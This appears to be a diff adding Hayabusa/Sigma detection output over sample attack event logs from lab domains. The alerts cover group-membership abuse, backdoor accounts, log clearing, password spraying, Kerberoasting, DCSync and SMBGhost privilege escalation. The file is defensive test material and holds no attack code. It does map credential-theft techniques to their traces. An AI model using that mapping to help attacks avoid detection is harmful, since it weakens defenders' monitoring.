+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
+2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
+2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: 172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: ::ffff:172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User:   :  Service:   :  IP Address: ::ffff:10.23.23.9  :  Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: Svc-SQL-DB01  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
